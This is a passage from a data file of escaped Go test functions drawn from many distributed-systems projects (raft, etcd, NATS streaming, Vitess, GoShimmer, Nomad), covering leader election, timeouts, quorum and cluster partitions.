wallet\")\n\t}\n\terr = w.Unlock(ctx, testPrivPass, timeChan2)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet\")\n\t}\n\ttimeChan2 <- time.Time{}\n\ttime.Sleep(100 * time.Millisecond) // Allow time for lock in background\n\tif !w.Locked() {\n\t\tt.Fatal(\"wallet did not lock using replacement timeout\")\n\t}\n\tselect {\n\tcase timeChan1 <- time.Time{}:\n\tdefault:\n\t\tt.Fatal(\"previous timeout was not read in background\")\n\t}\n}", "func TestTimeout(t *testing.T) {\n\tgo func() {\n\t\ttime.Sleep(10 * time.Second)\n\t\tt.Fatal()\n\t}()\n\n\tpub, sub := testClients(t, 500*time.Millisecond)\n\trequire.Nil(t, sub.Subscribe(\"timeoutTestChannel\").Err)\n\n\tr := sub.Receive() // should timeout after a second\n\tassert.Equal(t, Error, r.Type)\n\tassert.NotNil(t, r.Err)\n\tassert.True(t, r.Timeout())\n\n\twaitCh := make(chan struct{})\n\tgo func() {\n\t\tr = sub.Receive()\n\t\tclose(waitCh)\n\t}()\n\trequire.Nil(t, pub.Cmd(\"PUBLISH\", \"timeoutTestChannel\", \"foo\").Err)\n\t<-waitCh\n\n\tassert.Equal(t, Message, r.Type)\n\tassert.Equal(t, \"timeoutTestChannel\", r.Channel)\n\tassert.Equal(t, \"foo\", r.Message)\n\tassert.Nil(t, r.Err, \"%s\", r.Err)\n\tassert.False(t, r.Timeout())\n}", "func TestAutopeering(t *testing.T) {\n\tn, err := f.CreateAutopeeredNetwork(\"test_autopeering\", 4, 2, func(index int, cfg *framework.AppConfig) {\n\t\tcfg.Autopeering.Enabled = true\n\t})\n\trequire.NoError(t, err)\n\tdefer framework.ShutdownNetwork(t, n)\n\n\tsyncCtx, syncCtxCancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer syncCtxCancel()\n\n\tassert.NoError(t, n.AwaitAllSync(syncCtx))\n}", "func TestKillLeader(t *testing.T) {\n\tprocAttr := new(os.ProcAttr)\n\tprocAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}\n\n\tclusterSize := 5\n\targGroup, etcds, err := createCluster(clusterSize, procAttr, false)\n\n\tif err != nil {\n\t\tt.Fatal(\"cannot create cluster\")\n\t}\n\n\tdefer destroyCluster(etcds)\n\n\tleaderChan := make(chan string, 1)\n\n\ttime.Sleep(time.Second)\n\n\tgo leaderMonitor(clusterSize, 1, leaderChan)\n\n\tvar totalTime time.Duration\n\n\tleader := \"http://127.0.0.1:7001\"\n\n\tfor i := 0; i < clusterSize; i++ {\n\t\tfmt.Println(\"leader is \", leader)\n\t\tport, _ := strconv.Atoi(strings.Split(leader, \":\")[2])\n\t\tnum := port - 7001\n\t\tfmt.Println(\"kill server \", num)\n\t\tetcds[num].Kill()\n\t\tetcds[num].Release()\n\n\t\tstart := time.Now()\n\t\tfor {\n\t\t\tnewLeader := <-leaderChan\n\t\t\tif newLeader != leader {\n\t\t\t\tleader = newLeader\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\ttake := time.Now().Sub(start)\n\n\t\ttotalTime += take\n\t\tavgTime := totalTime / (time.Duration)(i+1)\n\n\t\tfmt.Println(\"Leader election time is \", take, \"with election timeout\", ElectionTimeout)\n\t\tfmt.Println(\"Leader election time average is\", avgTime, \"with election timeout\", ElectionTimeout)\n\t\tetcds[num], err = os.StartProcess(\"etcd\", argGroup[num], procAttr)\n\t}\n}", "func TestDvLIRClient_NTPServerTest(t *testing.T) {\n\tip := viper.GetString(\"IPAddress\")\n\tpw := viper.GetString(\"Password\")\n\n\tdvlirClient, err := NewDvLIRClient(ip, pw)\n\tif !assert.NoError(t, err, \"Error while creating Api client\") {\n\t\treturn\n\t}\n\n\terr = dvlirClient.Login()\n\tif !assert.NoError(t, err, \"Error during Login\") {\n\t\treturn\n\t}\n\n\tcode, err := dvlirClient.NTPServerTest(\"de.pool.ntp.org\")\n\tif !assert.NoError(t, err, \"Error while testing NTP server\") {\n\t\treturn\n\t}\n\tif code == 2 {\n\t\tfmt.Println(\"Please wait at least 30 seconds before repeating this request\")\n\t}\n\tif !assert.Equal(t, 1, code, \"Device didn't return correct return value\") {\n\t\treturn\n\t}\n\n\tfmt.Println(code)\n\n\tdefer func() {\n\t\terr = dvlirClient.Logout()\n\t\tif !assert.NoError(t, err, \"Error during Logout\") {\n\t\t\treturn\n\t\t}\n\t}()\n}", "func TestWaitForEnvoyTimeoutContinueWithoutEnvoy(t *testing.T) {\n\tfmt.Println(\"Starting TestWaitForEnvoyTimeoutContinueWithoutEnvoy\")\n\tos.Setenv(\"WAIT_FOR_ENVOY_TIMEOUT\", \"5s\")\n\tos.Setenv(\"ENVOY_ADMIN_API\", badServer.URL)\n\tinitTestingEnv()\n\tblockingCtx := waitForEnvoy()\n\t<-blockingCtx.Done()\n\terr := blockingCtx.Err()\n\tif err == nil || !errors.Is(err, context.DeadlineExceeded) {\n\t\tfmt.Println(\"TestWaitForEnvoyTimeoutContinueWithoutEnvoy err\", err)\n\t\t// Err is nil (envoy is up)\n\t\t// or Err is set, but is not a cancellation err\n\t\t// we expect a cancellation when the time is up\n\t\tt.Fail()\n\t}\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func TestSplitCloneV2_NoMasterAvailable(t *testing.T) {\n\tdelay := discovery.GetTabletPickerRetryDelay()\n\tdefer func() {\n\t\tdiscovery.SetTabletPickerRetryDelay(delay)\n\t}()\n\tdiscovery.SetTabletPickerRetryDelay(5 * time.Millisecond)\n\n\ttc := &splitCloneTestCase{t: t}\n\ttc.setUp(false /* v3 */)\n\tdefer tc.tearDown()\n\n\t// Only wait 1 ms between retries, so that the test passes faster.\n\t*executeFetchRetryTime = 1 * time.Millisecond\n\n\t// leftReplica will take over for the last, 30th, insert and the vreplication checkpoint.\n\ttc.leftReplicaFakeDb.AddExpectedQuery(\"INSERT INTO `vt_ks`.`table1` (`id`, `msg`, `keyspace_id`) VALUES (*\", nil)\n\n\t// During the 29th write, let the MASTER disappear.\n\ttc.leftMasterFakeDb.GetEntry(28).AfterFunc = func() {\n\t\tt.Logf(\"setting MASTER tablet to REPLICA\")\n\t\ttc.leftMasterQs.UpdateType(topodatapb.TabletType_REPLICA)\n\t\ttc.leftMasterQs.AddDefaultHealthResponse()\n\t}\n\n\t// If the HealthCheck didn't pick up the change yet, the 30th write would\n\t// succeed. To prevent this from happening, replace it with an error.\n\ttc.leftMasterFakeDb.DeleteAllEntriesAfterIndex(28)\n\ttc.leftMasterFakeDb.AddExpectedQuery(\"INSERT INTO `vt_ks`.`table1` (`id`, `msg`, `keyspace_id`) VALUES (*\", errReadOnly)\n\ttc.leftMasterFakeDb.EnableInfinite()\n\t// vtworker may not retry on leftMaster again if HealthCheck picks up the\n\t// change very fast. In that case, the error was never encountered.\n\t// Delete it or verifyAllExecutedOrFail() will fail because it was not\n\t// processed.\n\tdefer tc.leftMasterFakeDb.DeleteAllEntriesAfterIndex(28)\n\n\t// Wait for a retry due to NoMasterAvailable to happen, expect the 30th write\n\t// on leftReplica and change leftReplica from REPLICA to MASTER.\n\t//\n\t// Reset the stats now. It also happens when the worker starts but that's too\n\t// late because this Go routine looks at it and can run before the worker.\n\tstatsRetryCounters.ResetAll()\n\tgo func() {\n\t\tctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)\n\t\tdefer cancel()\n\n\t\tfor {\n\t\t\tretries := statsRetryCounters.Counts()[retryCategoryNoMasterAvailable]\n\t\t\tif retries >= 1 {\n\t\t\t\tt.Logf(\"retried on no MASTER %v times\", retries)\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\tpanic(fmt.Errorf(\"timed out waiting for vtworker to retry due to NoMasterAvailable: %v\", ctx.Err()))\n\t\t\tcase <-time.After(10 * time.Millisecond):\n\t\t\t\t// Poll constantly.\n\t\t\t}\n\t\t}\n\n\t\t// Make leftReplica the new MASTER.\n\t\ttc.leftReplica.TM.ChangeType(ctx, topodatapb.TabletType_MASTER)\n\t\tt.Logf(\"resetting tablet back to MASTER\")\n\t\ttc.leftReplicaQs.UpdateType(topodatapb.TabletType_MASTER)\n\t\ttc.leftReplicaQs.AddDefaultHealthResponse()\n\t}()\n\n\t// Run the vtworker command.\n\tif err := runCommand(t, tc.wi, tc.wi.wr, tc.defaultWorkerArgs); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func TestUnresponsive(t *testing.T) {\n\taddrs, teardown := gorums.TestSetup(t, 1, func(_ int) gorums.ServerIface {\n\t\tgorumsSrv := gorums.NewServer()\n\t\tsrv := &testSrv{}\n\t\tRegisterUnresponsiveServer(gorumsSrv, srv)\n\t\treturn gorumsSrv\n\t})\n\tdefer teardown()\n\n\tmgr := NewManager(\n\t\tgorums.WithDialTimeout(100*time.Millisecond),\n\t\tgorums.WithGrpcDialOptions(\n\t\t\tgrpc.WithBlock(),\n\t\t\tgrpc.WithTransportCredentials(insecure.NewCredentials()),\n\t\t),\n\t)\n\t_, err := mgr.NewConfiguration(gorums.WithNodeList(addrs))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tnode := mgr.Nodes()[0]\n\n\tfor i := 0; i < 1000; i++ {\n\t\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Millisecond)\n\t\t_, err = node.TestUnresponsive(ctx, &Empty{})\n\t\tif err != nil && errors.Is(err, context.Canceled) {\n\t\t\tt.Error(err)\n\t\t}\n\t\tcancel()\n\t}\n}", "func testNomadCluster(t *testing.T, nodeIpAddress string) {\n\tmaxRetries := 90\n\tsleepBetweenRetries := 10 * time.Second\n\n\tresponse := retry.DoWithRetry(t, \"Check Nomad cluster has expected number of servers and clients\", maxRetries, sleepBetweenRetries, func() (string, error) {\n\t\tclients, err := callNomadApi(t, nodeIpAddress, \"v1/nodes\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif len(clients) != DEFAULT_NUM_CLIENTS {\n\t\t\treturn \"\", fmt.Errorf(\"Expected the cluster to have %d clients, but found %d\", DEFAULT_NUM_CLIENTS, len(clients))\n\t\t}\n\n\t\tservers, err := callNomadApi(t, nodeIpAddress, \"v1/status/peers\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif len(servers) != DEFAULT_NUM_SERVERS {\n\t\t\treturn \"\", fmt.Errorf(\"Expected the cluster to have %d servers, but found %d\", DEFAULT_NUM_SERVERS, len(servers))\n\t\t}\n\n\t\treturn fmt.Sprintf(\"Got back expected number of clients (%d) and servers (%d)\", len(clients), len(servers)), nil\n\t})\n\n\tlogger.Logf(t, \"Nomad cluster is properly deployed: %s\", response)\n}", "func TestLeaderElectionJumpToGreaterView(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for larger view should replace current attempt.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 2)\n\n\t// ViewChange message from node 1 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 3)\n\tif exp, a := uint64(6), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n}", "func TestOrphanageTSC(t *testing.T) {\n\tt.Skip(\"TSC is currently disabled in the codebase. This test will be re-enabled once TSC is re-enabled.\")\n\tconst tscThreshold = 30 * time.Second\n\n\tsnapshotOptions := tests.OrphanageSnapshotOptions\n\tsnapshotInfo := snapshotcreator.NewOptions(snapshotOptions...)\n\tctx, cancel := tests.Context(context.Background(), t)\n\tdefer cancel()\n\tn, err := f.CreateNetwork(ctx, t.Name(), 4,\n\t\tframework.CreateNetworkConfig{\n\t\t\tStartSynced: false,\n\t\t\tFaucet: false,\n\t\t\tActivity: true,\n\t\t\tAutopeering: false,\n\t\t\tSnapshot: snapshotOptions,\n\t\t}, tests.CommonSnapshotConfigFunc(t, snapshotInfo, func(peerIndex int, isPeerMaster bool, conf config.GoShimmer) config.GoShimmer {\n\t\t\tconf.UseNodeSeedAsWalletSeed = true\n\t\t\tconf.TimeSinceConfirmationThreshold = tscThreshold\n\t\t\tconf.ValidatorActivityWindow = 10 * time.Minute\n\t\t\treturn conf\n\t\t}))\n\trequire.NoError(t, err)\n\tdefer tests.ShutdownNetwork(ctx, t, n)\n\n\tlog.Println(\"Bootstrapping network...\")\n\ttests.BootstrapNetwork(t, n)\n\tlog.Println(\"Bootstrapping network... done\")\n\n\tconst delayBetweenDataMessages = 500 * time.Millisecond\n\n\tvar (\n\t\tnode1 = n.Peers()[0]\n\t\tnode2 = n.Peers()[1]\n\t\tnode3 = n.Peers()[2]\n\t\tnode4 = n.Peers()[3]\n\t)\n\n\tlog.Printf(\"Sending %d data blocks to the whole network\", 10)\n\ttests.SendDataBlocksWithDelay(t, n.Peers(), 10, delayBetweenDataMessages)\n\n\tpartition1 := []*framework.Node{node4}\n\tpartition2 := []*framework.Node{node2, node3, node1}\n\n\t// split partitions\n\terr = n.CreatePartitionsManualPeering(ctx, partition1, partition2)\n\trequire.NoError(t, err)\n\n\t// check consensus mana\n\trequire.EqualValues(t, snapshotInfo.PeersAmountsPledged[0], tests.Mana(t, node1).Consensus)\n\tlog.Printf(\"node1 (%s): %d\", node1.ID().String(), tests.Mana(t, node1).Consensus)\n\trequire.EqualValues(t, snapshotInfo.PeersAmountsPledged[1], tests.Mana(t, node2).Consensus)\n\tlog.Printf(\"node2 (%s): %d\", node2.ID().String(), tests.Mana(t, node2).Consensus)\n\trequire.EqualValues(t, snapshotInfo.PeersAmountsPledged[2], tests.Mana(t, node3).Consensus)\n\tlog.Printf(\"node3 (%s): %d\", node3.ID().String(), tests.Mana(t, node3).Consensus)\n\trequire.EqualValues(t, snapshotInfo.PeersAmountsPledged[3], tests.Mana(t, node4).Consensus)\n\tlog.Printf(\"node4 (%s): %d\", node4.ID().String(), tests.Mana(t, node4).Consensus)\n\n\tlog.Printf(\"Sending %d data blocks on minority partition\", 30)\n\tblocksToOrphan := tests.SendDataBlocksWithDelay(t, partition1, 30, delayBetweenDataMessages)\n\tlog.Printf(\"Sending %d data blocks on majority partition\", 10)\n\tblocksToConfirm := tests.SendDataBlocksWithDelay(t, partition2, 10, delayBetweenDataMessages)\n\n\t// merge partitions\n\terr = n.DoManualPeering(ctx)\n\trequire.NoError(t, err)\n\n\t// sleep 10 seconds to make sure that TSC threshold is exceeded\n\ttime.Sleep(tscThreshold + time.Second)\n\n\tlog.Printf(\"Sending %d data messages to make sure that all nodes share the same view\", 30)\n\ttests.SendDataBlocksWithDelay(t, n.Peers(), 30, delayBetweenDataMessages)\n\n\ttests.RequireBlocksAvailable(t, n.Peers(), blocksToConfirm, time.Minute, tests.Tick, true)\n\ttests.RequireBlocksOrphaned(t, partition1, blocksToOrphan, time.Minute, tests.Tick)\n}", "func TestNoQuorum(t *testing.T) {\n\tcommitteeMock, keys := agreement.MockCommittee(3, true, 3)\n\teb, roundChan := initAgreement(committeeMock)\n\thash, _ := crypto.RandEntropy(32)\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\n\tselect {\n\tcase <-roundChan:\n\t\tassert.FailNow(t, \"not supposed to get a round update without reaching quorum\")\n\tcase <-time.After(100 * time.Millisecond):\n\t\t// all good\n\t}\n}", "func TestClusteringFollowerDeleteOldChannelPriorToSnapshotRestore(t *testing.T) {\n\tcleanupDatastore(t)\n\tdefer cleanupDatastore(t)\n\tcleanupRaftLog(t)\n\tdefer cleanupRaftLog(t)\n\n\trestoreMsgsAttempts = 2\n\trestoreMsgsRcvTimeout = 50 * time.Millisecond\n\trestoreMsgsSleepBetweenAttempts = 0\n\tdefer func() {\n\t\trestoreMsgsAttempts = defaultRestoreMsgsAttempts\n\t\trestoreMsgsRcvTimeout = defaultRestoreMsgsRcvTimeout\n\t\trestoreMsgsSleepBetweenAttempts = defaultRestoreMsgsSleepBetweenAttempts\n\t}()\n\n\t// For this test, use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\tmaxInactivity := 250 * time.Millisecond\n\n\t// Configure first server\n\ts1sOpts := getTestDefaultOptsForClustering(\"a\", true)\n\ts1sOpts.Clustering.TrailingLogs = 0\n\ts1sOpts.MaxInactivity = maxInactivity\n\ts1 := runServerWithOpts(t, s1sOpts, nil)\n\tdefer s1.Shutdown()\n\n\t// Configure second server.\n\ts2sOpts := getTestDefaultOptsForClustering(\"b\", false)\n\ts2sOpts.Clustering.TrailingLogs = 0\n\ts2sOpts.MaxInactivity = maxInactivity\n\ts2 := runServerWithOpts(t, s2sOpts, nil)\n\tdefer s2.Shutdown()\n\n\t// Configure third server.\n\ts3sOpts := getTestDefaultOptsForClustering(\"c\", false)\n\ts3sOpts.Clustering.TrailingLogs = 0\n\ts3sOpts.MaxInactivity = maxInactivity\n\ts3 := runServerWithOpts(t, s3sOpts, nil)\n\tdefer s3.Shutdown()\n\n\tservers := []*StanServer{s1, s2, s3}\n\n\t// Wait for leader to be elected.\n\tleader := getLeader(t, 10*time.Second, servers...)\n\n\t// Create a client connection.\n\tsc, err := stan.Connect(clusterName, clientName)\n\tif err != nil {\n\t\tt.Fatalf(\"Expected to connect correctly, got err %v\", err)\n\t}\n\tdefer sc.Close()\n\n\t// Send a message, which will create the channel\n\tchannel := \"foo\"\n\texpectedMsg := make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"1\")}\n\texpectedMsg[2] = msg{sequence: 2, data: []byte(\"2\")}\n\texpectedMsg[3] = msg{sequence: 3, data: []byte(\"3\")}\n\tfor i := 1; i < 4; i++ {\n\t\tif err := sc.Publish(channel, expectedMsg[uint64(i)].data); err != nil {\n\t\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t\t}\n\t}\n\t// Wait for channel to be replicated in all servers\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 3, expectedMsg, servers...)\n\n\t// Shutdown a follower\n\tvar follower *StanServer\n\tfor _, s := range servers {\n\t\tif leader != s {\n\t\t\tfollower = s\n\t\t\tbreak\n\t\t}\n\t}\n\tservers = removeServer(servers, follower)\n\tfollower.Shutdown()\n\n\t// Let the channel be deleted\n\ttime.Sleep(2 * maxInactivity)\n\n\t// Now send a message that causes the channel to be recreated\n\texpectedMsg = make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"4\")}\n\tif err := sc.Publish(channel, expectedMsg[1].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 1, expectedMsg, servers...)\n\n\t// Perform snapshot on the leader.\n\tif err := leader.raft.Snapshot().Error(); err != nil {\n\t\tt.Fatalf(\"Error during snapshot: %v\", err)\n\t}\n\n\t// Now send another message then a sub to prevent deletion\n\texpectedMsg[2] = msg{sequence: 2, data: []byte(\"5\")}\n\tif err := sc.Publish(channel, expectedMsg[2].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 2, expectedMsg, servers...)\n\tsc.Subscribe(channel, func(_ *stan.Msg) {}, stan.DeliverAllAvailable())\n\n\t// Now restart the follower...\n\tfollower = runServerWithOpts(t, follower.opts, nil)\n\tdefer follower.Shutdown()\n\tservers = append(servers, follower)\n\tgetLeader(t, 10*time.Second, servers...)\n\n\t// Now check content of channel on the follower.\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 2, expectedMsg, follower)\n}", "func TestDontExhaustMaxActiveIDs(t *testing.T) {\n\tconfig := cfg.TestConfig()\n\tconst N = 1\n\treactors := makeAndConnectReactors(config, N)\n\tdefer func() {\n\t\tfor _, r := range reactors {\n\t\t\tif err := r.Stop(); err != nil {\n\t\t\t\tassert.NoError(t, err)\n\t\t\t}\n\t\t}\n\t}()\n\treactor := reactors[0]\n\n\tfor i := 0; i < mempool.MaxActiveIDs+1; i++ {\n\t\tpeer := mock.NewPeer(nil)\n\t\treactor.ReceiveEnvelope(p2p.Envelope{\n\t\t\tChannelID: mempool.MempoolChannel,\n\t\t\tSrc: peer,\n\t\t\tMessage: &memproto.Message{}, // This uses the wrong message type on purpose to stop the peer as in an error state in the reactor.\n\t\t},\n\t\t)\n\t\treactor.AddPeer(peer)\n\t}\n}", "func TestPreVoteWithCheckQuorum(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tn1.checkQuorum = true\n\tn2.checkQuorum = true\n\tn3.checkQuorum = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// isolate node 1. node 2 and node 3 have leader info\n\tnt.isolate(1)\n\n\t// check state\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\t// node 2 will ignore node 3's PreVote\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// Do we have a leader?\n\tif n2.state != StateLeader && n3.state != StateFollower {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func assertReplicasNotOnSameNode(t *testing.T) {\n\ttables, _ := fakePegasusCluster.meta.ListAvailableApps()\n\tfor _, tb := range tables {\n\t\tresp, _ := fakePegasusCluster.meta.QueryConfig(tb.AppName)\n\t\tassert.Equal(t, len(resp.Partitions), int(tb.PartitionCount))\n\n\t\tfor _, p := range resp.Partitions {\n\t\t\tfor _, sec := range p.Secondaries {\n\t\t\t\tassert.NotEqual(t, p.Primary.GetAddress(), sec.GetAddress())\n\t\t\t}\n\t\t\tif len(p.Secondaries) >= 2 {\n\t\t\t\tassert.NotEqual(t, p.Secondaries[0].GetAddress(), p.Secondaries[1].GetAddress())\n\t\t\t}\n\t\t}\n\t}\n}", "func TestPoolTimeout(t *testing.T) {\n\tdefer leaktest.CheckTimeout(t, time.Second)()\n\n\tgo func() {\n\t\tfor {\n\t\t\ttime.Sleep(time.Second)\n\t\t}\n\t}()\n}", "func TestRaft2(t *testing.T) {\n\tack := make(chan bool)\n\n\tleader := raft.GetLeaderId()\n\n\t//Kill some one who is not a leader\n\ts1 := (leader + 1) % 5\n\traft.KillServer(s1)\n\tt.Log(\"Killed \", s1)\n\n\t//Once more\n\ts2 := (s1 + 1) % 5\n\traft.KillServer(s2)\n\tt.Log(\"Killed \", s2)\n\n\t//Kill leader now\n\tleader = raft.KillLeader()\n\n\t//Make sure new leader doesn't get elected\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tif leaderId != -1 {\n\t\t\tt.Error(\"Leader should not get elected!\")\n\t\t}\n\t\tack <- true\n\t})\n\t<-ack\n\n\t//Resurrect for next test cases\n\traft.ResurrectServer(leader)\n\traft.ResurrectServer(s1)\n\traft.ResurrectServer(s2)\n\n\t//Wait for 1 second for new leader to get elected\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack\n}", "func TestBadClient(t *testing.T) {\n\t<-seq1\n\tconfig := DefaultConfig()\n\tmid := int(math.Floor(float64(config.ClusterSize) / 2))\n\tnodeX, err := CreateNode(0, nil, config)\n\twaitTime := 500 * time.Millisecond\n\tif err != nil {\n\t\tt.Errorf(\"Error in making node\")\n\t\treturn\n\t}\n\t_, err = Connect(nodeX.GetRemoteSelf().Addr)\n\tif err == nil {\n\t\tt.Errorf(\"Should have in error, client connect before cluster made\")\n\t\treturn\n\t}\n\tnodes, err := CreateLocalCluster(config)\n\tif err != nil {\n\t\tError.Printf(\"Error creating nodes: %v\", err)\n\t\treturn\n\t}\n\ttimeDelay := randomTimeout(waitTime)\n\t<-timeDelay\n\tclient, err := Connect(nodes[0].GetRemoteSelf().Addr)\n\tfor err != nil {\n\t\tclient, err = Connect(nodes[0].GetRemoteSelf().Addr)\n\t}\n\ttimeDelay = randomTimeout(waitTime)\n\t<-timeDelay\n\tcount := 0\n\tfor _, node := range nodes {\n\t\tentry := node.getLogEntry(1)\n\t\tif entry != nil && entry.Type == CommandType_CLIENT_REGISTRATION {\n\t\t\tcount += 1\n\t\t}\n\t}\n\tif count <= mid {\n\t\tt.Errorf(\"Client Still Not Registered\")\n\t\treturn\n\t}\n\t//verifying visually that state is proper\n\tnodes[0].Out(nodes[0].String())\n\tnodes[0].Out(nodes[0].FormatState())\n\tnodes[0].Out(nodes[0].FormatLogCache())\n\t//hash before init called\n\ttimeDelay = randomTimeout(waitTime)\n\t<-timeDelay\n\terr = client.SendRequest(hashmachine.HASH_CHAIN_ADD, []byte(strconv.Itoa(1)))\n\tif err == nil {\n\t\tt.Errorf(\"Client request should have failed %v\", err)\n\t\treturn\n\t}\n\ttimeDelay = randomTimeout(waitTime)\n\t<-timeDelay\n\terr = client.SendRequest(hashmachine.HASH_CHAIN_INIT, []byte(strconv.Itoa(1)))\n\tif err != nil {\n\t\tt.Errorf(\"Client request failed\")\n\t\treturn\n\t}\n\t//init after hash called\n\ttimeDelay = randomTimeout(waitTime)\n\tinitRequests := 5\n\t<-timeDelay\n\tfor i := 0; i < initRequests; i++ {\n\t\terr = client.SendRequest(hashmachine.HASH_CHAIN_INIT, []byte(strconv.Itoa(i)))\n\t\t//wait briefly after requests\n\t\ttimeDelay = randomTimeout(waitTime)\n\t\t<-timeDelay\n\t\tif err == nil {\n\t\t\tt.Errorf(\"Client request should have failed\")\n\t\t\treturn\n\t\t}\n\t}\n\ttimeDelay = randomTimeout(waitTime)\n\t<-timeDelay\n\tfor i := 4; i < 4+initRequests; i++ {\n\t\tcount = 0\n\t\tfor _, node := range nodes {\n\t\t\tentry := node.getLogEntry(uint64(i))\n\t\t\tif entry != nil && entry.Type == CommandType_STATE_MACHINE_COMMAND {\n\t\t\t\tcount += 1\n\t\t\t}\n\t\t}\n\t\tif count <= mid {\n\t\t\tt.Errorf(\"Commands should have been stored even if bad commands\")\n\t\t\treturn\n\t\t}\n\t}\n\t//send request to follower node\n\tif nodes[0].State != LEADER_STATE {\n\t\tclient.Leader = nodes[0].GetRemoteSelf()\n\t} else {\n\t\tclient.Leader = nodes[1].GetRemoteSelf()\n\t}\n\terr = client.SendRequest(hashmachine.HASH_CHAIN_ADD, []byte(strconv.Itoa(50)))\n\tif err != nil {\n\t\tt.Errorf(\"Should have successfully been performed\")\n\t}\n\tfor _, node := range nodes {\n\t\tnode.IsShutdown = true\n\t\t//node.GracefulExit()\n\t\ttimeDelay = randomTimeout(5 * 